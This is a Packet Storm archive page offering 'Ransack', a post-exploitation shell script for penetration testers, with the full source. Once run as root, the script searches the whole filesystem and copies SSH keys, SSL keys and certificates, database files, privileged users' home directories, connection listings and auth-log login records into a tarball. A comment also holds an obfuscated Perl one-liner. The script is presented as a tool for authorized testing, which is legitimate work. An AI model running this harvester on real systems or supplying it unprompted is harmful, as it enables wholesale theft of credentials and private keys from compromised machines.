ignore security and it'll go away

Ransack Post Exploitation Tool

Ransack Post Exploitation Tool
Posted May 3, 2012
Authored by Jesus Oquendo

Ransack is a post exploitation shellscript for penetration testers. Its purpose is to grab any information deemed relevant on a system, post root compromise. This information may include config files, ssh keys, ssl keys, or any other information deemed valuable.

tags | tool, root, forensics
MD5 | 0962e2345c1f5dbab439c0b85f04748f

Ransack Post Exploitation Tool

Change Mirror Download

# Ransack Post Exploitation Tool v 0.1

# Ransack's sole purpose is to grab any information deemed
# relevant following a root compromise during an authorized
# penetration test. This information may include config
# files, ssh keys, ssl keys, or any other information
# deemed valuable.

# The goal is to minimize the amount of time spent digging
# through a machine in search of specifics. Instead,
# ransack will look for any data that stores configuration
# information (which may at times contain usernames and
# passwords), connection based information (including who
# is connected to what, what processes are listening and
# so forth), usernames and groups.

# It is written specifically as a shell script to avoid
# relying on another programming language that may not at
# times be available on another system. Rather than having
# to install python, perl, ruby, etc., it relies on tools
# that are always on most modern and legacy Unix variants.
# It will also parse out who may be what is considered at
# high value target: Someone in a specific group (wheel,
# root, etc) and copy over their information as well.

# This tool is for post exploitation penetration testing
# it is not meant to be used for nefarious purposes and
# was never meant to be. It is simply a tool to make
# gathering information simpler while performing
# AUTHORIZED penetration tests.

# If you have to ask: "How does it work?!?", "How can I
# get r00t?!?", or some other question along these lines
# there is a 99.99999% chance that there is an ID 10 T
# error on the machine you're using. You will need to
# fix that issue before proceeding.

# Sloppy - sure, but effective, reliable and quick
# Tested on various versions of FreeBSD, OpenBSD, Debian,
# CentOS, Ubuntu, etc.

# On FreeBSD/AMD Athlon(tm) 64 X2 Dual Core Processor
# 4400+ with 2TB, I was able to get all that I needed in
# under 6 minutes. YMMV

# On Linux
# $ awk '/model name|MHz/' /proc/cpuinfo
# model name : AMD Phenom(tm) 9850 Quad-Core Processor
# cpu MHz : 2511.730
#
# 1 TB took 8 minutes

# Better than spending too much time figuring out what's
# what and where on a system. 0.1 is due to me coming
# out with a Solaris and OSX iteration in a bit.

#
# ''=~('(?{'.('._).^~'^'^-@@*^').'"'.(']),^'^'.@@|').',$/})')
#

if [ "$(id -u)" != "0" ]; then
clear ; printf "apropos RTFM\n" 1>&2
exit 1
fi

if [ -d "/tmp/0xdeadbeef" ]
then
rm -rf /tmp/0xdeadbeef
fi

dir=/tmp/0xdeadbeef/

echo "Making directories"

mkdir $dir
cd $dir
mkdir sshkeys certificates databases configurations

# Not using xrags piped from find to avoid errors with
# trailing lines

find / -name .ssh > $dir/sshkeys/sshkeys
find / | awk '/\.crt|\.pem|\.key|\.cert/' > $dir/certificates/certs
find / |awk '/\.db|\.sql|\.sqlite/ && !/\/ports\/|msf/' > $dir/databases/db

echo "Getting user information..."
last | awk '{print $1,$3}'|sort -u > $dir/user.data.ransack

clear ; echo "Finding what's opened connection wise"
lsof | grep -i listen | awk '{print $1"\t"$3"\t"$9}'|\
sort -u > $dir/listening.data.ransack

clear ; echo "Finding out who owns processes and what groups can modify those processes"
which `lsof | grep -i listen | awk '{print $1"\t"$3"\t"$9}'|\
sort -u` |xargs ls -lth > $dir/owners.data.ransack

clear ; echo "Finding interesting groups"
awk -F ":" '$3 <= 1000 {print}' /etc/group |\
grep -vi "#" > $dir/groups.data.ransack

clear ; echo "Finding high value targets and ransacking them"
awk -F ":" '{print $1}' $dir/groups.data.ransack | while read group
do ls -ltha /home/|grep $group |\
awk '{print "cp -Rf /home/"$9" /tmp/0xdeadbeef/"}'|\
grep -v "e/\." | sh
done


clear ; echo "Finding established sessions (network recon)"
netstat -a | awk '/LIST|EST|CLO/' | sort -u > $dir/connexion.data.ransack

clear ; if [ -e /var/log/secure ]
then
awk '/ccept/{print $9,$11}' /var/log/secure|sort -u > $dir/connexion.data.ransack
else
if [ -e /var/log/auth.log ]
then
awk '/ccept/{print $9,$11}' /var/log/auth.log | sort -u > $dir/connexion.data.ransack
fi
fi

for i in `cat $dir/sshkeys/sshkeys`
do
cp -Rf "$i" $dir/sshkeys/
done


for j in `cat $dir/certificates/certs`
do
cp -Rf "$j" $dir/certificates/
done

for k in `cat $dir/databases/db`
do
cp -Rf "$k" $dir/databases/
done

tar -cf /tmp/ransack.tar $dir/*
clear
echo "Ransacking done" ; ls -ltha /tmp/ransack.tar

rm -rf $dir

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    2 Files
  • 2
    Jul 2nd
    3 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    4 Files
  • 5
    Jul 5th
    15 Files
  • 6
    Jul 6th
    15 Files
  • 7
    Jul 7th
    10 Files
  • 8
    Jul 8th
    2 Files
  • 9
    Jul 9th
    10 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    15 Files
  • 12
    Jul 12th
    19 Files
  • 13
    Jul 13th
    16 Files
  • 14
    Jul 14th
    15 Files
  • 15
    Jul 15th
    3 Files
  • 16
    Jul 16th
    2 Files
  • 17
    Jul 17th
    8 Files
  • 18
    Jul 18th
    11 Files
  • 19
    Jul 19th
    15 Files
  • 20
    Jul 20th
    15 Files
  • 21
    Jul 21st
    15 Files
  • 22
    Jul 22nd
    6 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close